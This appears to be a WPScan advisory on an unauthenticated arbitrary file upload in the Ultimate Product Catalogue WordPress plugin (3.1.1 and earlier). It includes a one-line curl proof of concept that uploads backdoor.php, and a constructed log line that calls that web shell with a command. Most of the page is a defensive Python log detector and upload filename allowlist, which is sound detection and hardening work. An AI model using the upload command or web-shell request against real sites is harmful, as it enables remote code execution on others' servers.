Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload


Description
The plugin's spreadsheet-import handler (the UPCP_AddProductSpreadsheet action, reachable through wp-admin/admin-ajax.php) accepts a file upload without checking that the caller is authenticated or that the file is a spreadsheet. By sending a specially crafted multipart HTTP POST request to it, a remote unauthenticated attacker can upload an arbitrary file, such as a PHP script, and execute it in the context of the web server process.
Proof of Concept
curl -v -k -X POST -F "Products_Spreadsheet=@./backdoor.php" "www.example.com/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet"
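
The following is an added example written for this page, not code from the WPScan team or the plugin. It shows two things a practitioner wants once the PoC above is understood: how to spot attempts against this endpoint in a web server access log, and the allowlist check a hardened upload handler should apply to the client-supplied filename. Assumptions: the log is in Apache/nginx "combined" format (the sample lines are constructed, not from a real server); the parameter name `Action` and value `UPCP_AddProductSpreadsheet` are taken from the PoC above; the rule for PHP requested under `/wp-content/uploads/` is a generic WordPress web-shell signal, since this page does not say where the plugin stores the uploaded file; the `csv`/`xls`/`xlsx` allowlist is illustrative and is not a description of the 3.1.2 fix.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in Apache/nginx "combined" format.
# They are made up for this example and do not come from any real server;
# 203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Apr/2015:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet HTTP/1.1" 200 15 "-" "curl/7.38.0"
203.0.113.5 - - [22/Apr/2015:10:01:09 +0000] "GET /wp-content/uploads/backdoor.php?cmd=id HTTP/1.1" 200 61 "-" "curl/7.38.0"
198.51.100.7 - - [22/Apr/2015:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "https://www.example.com/wp-admin/" "Mozilla/5.0"
198.51.100.9 - - [22/Apr/2015:10:03:11 +0000] "GET /product-catalogue/ HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""

# One "combined" log line: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Plugin request parameter and action name, copied from the PoC on this page.
# WordPress dispatches admin-ajax.php on the lowercase "action" key; the plugin
# reads its own capitalised "Action" key, so both appear in the request.
UPCP_PARAM = "Action"
UPCP_ACTION = "UPCP_AddProductSpreadsheet"

# .php, .php5, .phtml, .phar, either at the end of the name or followed by
# another extension (backdoor.php.csv), case-insensitive.
DANGEROUS_EXT_RE = re.compile(r"\.ph(?:p\d?|tml|ar)(?:\.|$)", re.IGNORECASE)


def find_upcp_upload_attempts(log_text: str) -> list[dict]:
    """Return one finding per suspicious log line, in log order.

    Rule "upcp_spreadsheet_upload": a POST to admin-ajax.php carrying the
    plugin's spreadsheet-upload action. The log cannot show whether the caller
    was logged in, so every hit is worth checking, not only anonymous ones.
    Rule "php_under_uploads": PHP requested from /wp-content/uploads/, a
    generic signal for a dropped web shell (assumption: the plugin writes the
    file somewhere under uploads; this page does not state the location).
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        parts = urlsplit(m["target"])
        params = parse_qs(parts.query, keep_blank_values=True)
        if (m["method"] == "POST"
                and parts.path.endswith("/wp-admin/admin-ajax.php")
                and UPCP_ACTION in params.get(UPCP_PARAM, [])):
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "rule": "upcp_spreadsheet_upload"})
        elif (parts.path.startswith("/wp-content/uploads/")
                and DANGEROUS_EXT_RE.search(parts.path)):
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "rule": "php_under_uploads", "path": parts.path})
    return findings


def is_acceptable_spreadsheet_name(filename: str) -> bool:
    """Allowlist check a hardened upload handler should apply to the
    client-supplied name before writing it anywhere web-accessible.

    Accepts only a spreadsheet extension and rejects a PHP-like segment
    anywhere in the name, because backdoor.php.csv can still be executed under
    some Apache AddHandler configurations. Illustrative; not the plugin's fix.
    """
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]  # drop any path part
    if not name or name.startswith("."):
        return False
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in {"csv", "xls", "xlsx"}:
        return False
    return DANGEROUS_EXT_RE.search(name) is None


if __name__ == "__main__":
    for f in find_upcp_upload_attempts(SAMPLE_LOG):
        print(f)
    for n in ("products.csv", "backdoor.php", "backdoor.php.csv"):
        print(n, is_acceptable_spreadsheet_name(n))
```

On the sample log the detector reports the PoC-style POST from 203.0.113.5 and the follow-up request that executes backdoor.php, while the ordinary heartbeat POST to admin-ajax.php is ignored. The filename check is only one layer: the handler should also store uploads outside the document root or in a directory where PHP execution is disabled, and only logged-in users with the appropriate capability should reach the action at all.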

Affects

Plugin ultimate-product-catalogue
fixed in version 3.1.2

References

URL http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability
URL https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_ultimate_product_catalogue_file_upload.rb

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Luca Ercoli
Submitter Website http://blog.seeweb.it/
Submitter Twitter seeweblive
Views 199
Verified No
WPVDB ID 7939

Timeline

Publicly Published 2015-04-22
Added 2015-04-26
Last Updated 2016-07-29

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.